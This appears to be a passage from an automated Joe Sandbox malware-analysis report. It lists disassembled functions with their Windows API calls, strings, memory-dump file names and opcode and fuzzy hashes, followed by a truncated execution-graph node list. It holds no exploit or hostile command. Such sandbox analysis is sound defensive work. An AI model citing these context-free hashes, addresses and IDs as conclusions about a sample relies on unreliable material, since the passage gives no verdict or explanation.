                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                    • API String ID: 0-56093855
                                                                    • Opcode ID: 61971b8265f8d4fba67a1342b05fc03836b64dd886f755d135b8aed879db396e
                                                                    • Instruction ID: 2284288920edbb7438bcec004290c788fab5bf309edc1e1a35eee016bc9d5daa
                                                                    • Opcode Fuzzy Hash: 61971b8265f8d4fba67a1342b05fc03836b64dd886f755d135b8aed879db396e
                                                                    • Instruction Fuzzy Hash: 51014871609346EFDB559F28EC48AB77FA8AB19790F084026F946D3370D6219860DBB0
                                                                    APIs
                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 00D94B42
                                                                      • Part of subcall function 00DB106D: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00DB1079
                                                                      • Part of subcall function 00DB106D: ___delayLoadHelper2@8.DELAYIMP ref: 00DB109F
                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 00D94B4D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: Xinvalid_argumentstd::_$Helper2@8Load___delaystd::invalid_argument::invalid_argument
                                                                    • String ID: string too long$vector too long
                                                                    • API String ID: 2355824318-1617939282
                                                                    • Opcode ID: 2f0e63ae2e1d82a8e4f0a34dff7e78af09cf9be3e80ce1c6aa0510a2d375ee3c
                                                                    • Instruction ID: 88801be92f4c2b607842f709ee0dea44ad86831001e1c017c56a61ed96f6e173
                                                                    • Opcode Fuzzy Hash: 2f0e63ae2e1d82a8e4f0a34dff7e78af09cf9be3e80ce1c6aa0510a2d375ee3c
                                                                    • Instruction Fuzzy Hash: E4F0A031200304AB8F34AF59DC46D4AB3EDEF84B68B10091AF985C3602C3B0E94587B1
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: __alldvrm$_strrchr
                                                                    • String ID:
                                                                    • API String ID: 1036877536-0
                                                                    • Opcode ID: d14ae59a6c47695d102f38ce8bebab2561187863f3de3b9f7c7780fcd14afeb7
                                                                    • Instruction ID: 54dd9e21e3258a98f0cffc762363486eda4f1f080b0e51819bcbf69fd13cb0ca
                                                                    • Opcode Fuzzy Hash: d14ae59a6c47695d102f38ce8bebab2561187863f3de3b9f7c7780fcd14afeb7
                                                                    • Instruction Fuzzy Hash: D6A13772A20386DFDB25CF68C8917EEBBE4FF52350F18416DE496AB242C6388941C774
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,?,?,00D99343,?,?,?), ref: 00D9C1EE
                                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,?,00D99343,?,?), ref: 00D9C22C
                                                                    • SetFileTime.KERNEL32(00000800,?,?,00000000,?,?,?,00D99343,?,?,?,?,?,?,?,?), ref: 00D9C2AF
                                                                    • CloseHandle.KERNEL32(00000800,?,?,?,00D99343,?,?,?,?,?,?,?,?,?,?), ref: 00D9C2B6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: File$Create$CloseHandleTime
                                                                    • String ID:
                                                                    • API String ID: 2287278272-0
                                                                    • Opcode ID: 5a90a7c4cbef208b5a46e74f3f42a8a9318fc1d0638b03f27cb58641f3d5a35c
                                                                    • Instruction ID: bc1bc4ebc44774abd2102ec9241412c97d5d972f866886b43663031824ad1304
                                                                    • Opcode Fuzzy Hash: 5a90a7c4cbef208b5a46e74f3f42a8a9318fc1d0638b03f27cb58641f3d5a35c
                                                                    • Instruction Fuzzy Hash: C341F3302583819EEB21DF64DC51FABB7E8AF89700F08091DF5D2E71C1D664EA488776
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen
                                                                    • String ID:
                                                                    • API String ID: 176396367-0
                                                                    • Opcode ID: 2b7bcb84ad9eaec8822e87a6a3bd6ff6ea22e070a044d49416d4873e617a3547
                                                                    • Instruction ID: d072afeceb4147de17e041252ebf0e3501991afc3fc626873bdc7da2ab816264
                                                                    • Opcode Fuzzy Hash: 2b7bcb84ad9eaec8822e87a6a3bd6ff6ea22e070a044d49416d4873e617a3547
                                                                    • Instruction Fuzzy Hash: 0C41A4719087529BC725DF38C8459AFBBE8EF85700F04492DF989D3250DB30E9058BB6
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,62E85006,00DB6F64,00000000,00000000,00DB7F99,?,00DB7F99,?,00000001,00DB6F64,62E85006,00000001,00DB7F99,00DB7F99), ref: 00DBF025
                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00DBF0AE
                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00DBF0C0
                                                                    • __freea.LIBCMT ref: 00DBF0C9
                                                                      • Part of subcall function 00DBBC8E: RtlAllocateHeap.NTDLL(00000000,?,?,?,00DB6A24,?,0000015D,?,?,?,?,00DB7F00,000000FF,00000000,?,?), ref: 00DBBCC0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                    • String ID:
                                                                    • API String ID: 2652629310-0
                                                                    • Opcode ID: 7e70494771ae154438b54b142e557589f7c791c0aea536090501eee5309bcb0d
                                                                    • Instruction ID: bb6dc1cfd725e295290f92d1063d8f0a1056b679079d33a8025c2ac2b2c1e6e7
                                                                    • Opcode Fuzzy Hash: 7e70494771ae154438b54b142e557589f7c791c0aea536090501eee5309bcb0d
                                                                    • Instruction Fuzzy Hash: 2D31A072A0021AEBDB25AF64DC45EEE7BA5EB44710B084129FC05D72A1EB35DD54CBB0
                                                                    APIs
                                                                    • GetDC.USER32(00000000), ref: 00DAC5F6
                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 00DAC605
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00DAC613
                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00DAC621
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: CapsDevice$Release
                                                                    • String ID:
                                                                    • API String ID: 1035833867-0
                                                                    • Opcode ID: 63ff91193044e79b2a1c7729ed3f8ca4d0f9f9738945cc45025b025c7adfa1ef
                                                                    • Instruction ID: 444f7f3686949c648b53ce84686e1ef34f6aee1f5f875e9bee87fe1514db4e94
                                                                    • Opcode Fuzzy Hash: 63ff91193044e79b2a1c7729ed3f8ca4d0f9f9738945cc45025b025c7adfa1ef
                                                                    • Instruction Fuzzy Hash: 94E0EC319AA761A7D7611B60AC1DFE63B64FF1A713F089106F601D63A0CA705404CFF5
                                                                    APIs
                                                                      • Part of subcall function 00DAC629: GetDC.USER32(00000000), ref: 00DAC62D
                                                                      • Part of subcall function 00DAC629: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00DAC638
                                                                      • Part of subcall function 00DAC629: ReleaseDC.USER32(00000000,00000000), ref: 00DAC643
                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 00DAC7E0
                                                                      • Part of subcall function 00DACA67: GetDC.USER32(00000000), ref: 00DACA70
                                                                      • Part of subcall function 00DACA67: GetObjectW.GDI32(?,00000018,?), ref: 00DACA9F
                                                                      • Part of subcall function 00DACA67: ReleaseDC.USER32(00000000,?), ref: 00DACB37
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: ObjectRelease$CapsDevice
                                                                    • String ID: (
                                                                    • API String ID: 1061551593-3887548279
                                                                    • Opcode ID: 18564bfe59b54531424cd198f005ad43e9e70b351ffe1d389d163522a014d7b6
                                                                    • Instruction ID: d537b11268c0f92871f53d382e5ebdd2f348e461a3483c3aae94196dea945efd
                                                                    • Opcode Fuzzy Hash: 18564bfe59b54531424cd198f005ad43e9e70b351ffe1d389d163522a014d7b6
                                                                    • Instruction Fuzzy Hash: 9191CD71618356AFD610DF29C844E2BBBE8FF89B10F00495EF48AD7260DB74E905CB62
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen
                                                                    • String ID: }
                                                                    • API String ID: 176396367-4239843852
                                                                    • Opcode ID: 14af22bc69374b2dd23c2f73a3bbb3e6434dd0d6c14b2370f63cc5878a826bfe
                                                                    • Instruction ID: d9f70448777cbd7f0aeb4fb18e02df59557cd3284263a854d5975bf9323cda2a
                                                                    • Opcode Fuzzy Hash: 14af22bc69374b2dd23c2f73a3bbb3e6434dd0d6c14b2370f63cc5878a826bfe
                                                                    • Instruction Fuzzy Hash: 3621C1329083459AD731EB74D845AABB3EDEF86710F44042EF542C3541EA74E848C7F2
                                                                    APIs
                                                                      • Part of subcall function 00DA12F6: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00DA1315
                                                                      • Part of subcall function 00DA12F6: GetProcAddress.KERNEL32(00DDC1F0,CryptUnprotectMemory), ref: 00DA1325
                                                                    • GetCurrentProcessId.KERNEL32(?,00000200,?,00DA1366), ref: 00DA13F9
                                                                    Strings
                                                                    • CryptProtectMemory failed, xrefs: 00DA13B0
                                                                    • CryptUnprotectMemory failed, xrefs: 00DA13F1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$CurrentProcess
                                                                    • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                    • API String ID: 2190909847-396321323
                                                                    • Opcode ID: 6a3cbf286c853c1ea7a2a5943bd4b6ffb1210e609104c805e5d3f864b652e576
                                                                    • Instruction ID: 3da6c9379938a6f3a90978168a5d3ac4f81ade39d9024294544b928092009d47
                                                                    • Opcode Fuzzy Hash: 6a3cbf286c853c1ea7a2a5943bd4b6ffb1210e609104c805e5d3f864b652e576
                                                                    • Instruction Fuzzy Hash: EA112936605326ABDF155F24DC01D6E3B64EF06764F084126FC01AB392D674DD418AF4
                                                                    APIs
                                                                    • _swprintf.LIBCMT ref: 00D9D8D3
                                                                      • Part of subcall function 00D94C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D94C13
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: __vswprintf_c_l_swprintf
                                                                    • String ID: %c:\
                                                                    • API String ID: 1543624204-3142399695
                                                                    • Opcode ID: 028bb38ff026d420c5a41ba6db359cd3235fde6c247e9d6ecc51dd6b9f627d01
                                                                    • Instruction ID: 75466bc9d13ae3bcec72ad8c8519ce111067c13b00ac63407e7841b84202b34e
                                                                    • Opcode Fuzzy Hash: 028bb38ff026d420c5a41ba6db359cd3235fde6c247e9d6ecc51dd6b9f627d01
                                                                    • Instruction Fuzzy Hash: 9A01D463504312BADF30BBB59C46EABF7ADEE95760754451AF485C7183EA20E840CAB1
                                                                    APIs
                                                                      • Part of subcall function 00DA0244: _swprintf.LIBCMT ref: 00DA0284
                                                                      • Part of subcall function 00DA0244: _strlen.LIBCMT ref: 00DA02A5
                                                                      • Part of subcall function 00DA0244: SetDlgItemTextW.USER32(?,00DD2274,?), ref: 00DA02FE
                                                                      • Part of subcall function 00DA0244: GetWindowRect.USER32(?,?), ref: 00DA0334
                                                                      • Part of subcall function 00DA0244: GetClientRect.USER32(?,?), ref: 00DA0340
                                                                    • GetDlgItem.USER32(00000000,00003021), ref: 00D913AA
                                                                    • SetWindowTextW.USER32(00000000,00DC65F4), ref: 00D913C0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                    • String ID: 0
                                                                    • API String ID: 2622349952-4108050209
                                                                    • Opcode ID: aed248ddc7e21c46c80eb387529637034917e167265777fe0987eb616b1c7bfc
                                                                    • Instruction ID: 8780f3a9ee2cf8cd29bb476b805e2c08716ce9c8cbaabbe71265cea6507fa706
                                                                    • Opcode Fuzzy Hash: aed248ddc7e21c46c80eb387529637034917e167265777fe0987eb616b1c7bfc
                                                                    • Instruction Fuzzy Hash: 06F04F3814434EAADF151F61AC0DBF93BB8AF05315F088214FC4595EA1CBB6C995EA70
                                                                    APIs
                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,00DA31E7,?,?,00DA325F,?,?,?,?,?,00DA3249), ref: 00DA30D0
                                                                    • GetLastError.KERNEL32(?,?,00DA325F,?,?,?,?,?,00DA3249), ref: 00DA30DC
                                                                      • Part of subcall function 00D97BAD: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D97BD5
                                                                    Strings
                                                                    • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00DA30E5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                    • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                    • API String ID: 1091760877-2248577382
                                                                    • Opcode ID: 248833b20a28997c251329c784d42bf436d1707b5e90edc6e0c3bbad3bbb2e8e
                                                                    • Instruction ID: f9076c683316bdb5583510d24dcc81e494a596c3a4fec521d37aeae2346e3e94
                                                                    • Opcode Fuzzy Hash: 248833b20a28997c251329c784d42bf436d1707b5e90edc6e0c3bbad3bbb2e8e
                                                                    • Instruction Fuzzy Hash: A3D05E3190C63236DA0137246C0AD7E3949AB62335F644718F139A63E5CA208D4156F5
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00D9F951,?), ref: 00DA01FF
                                                                    • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00D9F951,?), ref: 00DA020D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: FindHandleModuleResource
                                                                    • String ID: RTL
                                                                    • API String ID: 3537982541-834975271
                                                                    • Opcode ID: ea997c283223ea9ac5cc790be13322674f7f9a76f5eefe04a46c055526667f44
                                                                    • Instruction ID: 02db667b1f83158e8250c3f28b39b666f6f51845023ed55d1fbbb68e99cf9389
                                                                    • Opcode Fuzzy Hash: ea997c283223ea9ac5cc790be13322674f7f9a76f5eefe04a46c055526667f44
                                                                    • Instruction Fuzzy Hash: 93C01231280752AAEA3067716C0DF832E68AB05B11F090648B546EB2C0EAE6C88686B0

                                                                    Execution Graph

                                                                    Execution Coverage:11.2%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:0.4%
                                                                    Total number of Nodes:2000
                                                                    Total number of Limit Nodes:32
                                                                    execution_graph 15996 7ff67d017f4c 15997 7ff67d017f7a 15996->15997 15998 7ff67d017fb3 15996->15998 16000 7ff67d0155c4 _findclose 11 API calls 15997->16000 15998->15997 15999 7ff67d017fb8 FindFirstFileExW 15998->15999 16001 7ff67d017fda GetLastError 15999->16001 16002 7ff67d018021 15999->16002 16003 7ff67d017f7f 16000->16003 16004 7ff67d018011 16001->16004 16005 7ff67d017fe5 16001->16005 16056 7ff67d0181bc 16002->16056 16006 7ff67d01afa4 _invalid_parameter_noinfo 37 API calls 16003->16006 16010 7ff67d0155c4 _findclose 11 API calls 16004->16010 16005->16004 16012 7ff67d017fef 16005->16012 16013 7ff67d018001 16005->16013 16009 7ff67d017f8a 16006->16009 16017 7ff67d00bdc0 _wfindfirst32i64 8 API calls 16009->16017 16010->16009 16011 7ff67d0181bc _wfindfirst32i64 10 API calls 16014 7ff67d018047 16011->16014 16012->16004 16015 7ff67d017ff4 16012->16015 16016 7ff67d0155c4 _findclose 11 API calls 16013->16016 16018 7ff67d0181bc _wfindfirst32i64 10 API calls 16014->16018 16019 7ff67d0155c4 _findclose 11 API calls 16015->16019 16016->16009 16020 7ff67d017f9e 16017->16020 16021 7ff67d018055 16018->16021 16019->16009 16063 7ff67d020f54 16021->16063 16024 7ff67d01807f 16025 7ff67d01afc4 _wfindfirst32i64 17 API calls 16024->16025 16026 7ff67d018093 16025->16026 16027 7ff67d0180bd 16026->16027 16029 7ff67d0180fc FindNextFileW 16026->16029 16028 7ff67d0155c4 _findclose 11 API calls 16027->16028 16030 7ff67d0180c2 16028->16030 16031 7ff67d01810b GetLastError 16029->16031 16032 7ff67d01814c 16029->16032 16033 7ff67d01afa4 _invalid_parameter_noinfo 37 API calls 16030->16033 16035 7ff67d018116 16031->16035 16036 7ff67d01813f 16031->16036 16034 7ff67d0181bc _wfindfirst32i64 10 API calls 16032->16034 16037 7ff67d0180cd 16033->16037 16039 7ff67d018164 16034->16039 16035->16036 16042 7ff67d018120 16035->16042 16043 7ff67d018132 16035->16043 16038 7ff67d0155c4 _findclose 11 API calls 16036->16038 16040 7ff67d00bdc0 _wfindfirst32i64 8 API calls 16037->16040 16038->16037 16041 7ff67d0181bc _wfindfirst32i64 10 API calls 16039->16041 16044 7ff67d0180e0 16040->16044 16045 7ff67d018172 16041->16045 16042->16036 16046 7ff67d018125 16042->16046 16047 7ff67d0155c4 _findclose 11 API calls 16043->16047 16048 7ff67d0181bc _wfindfirst32i64 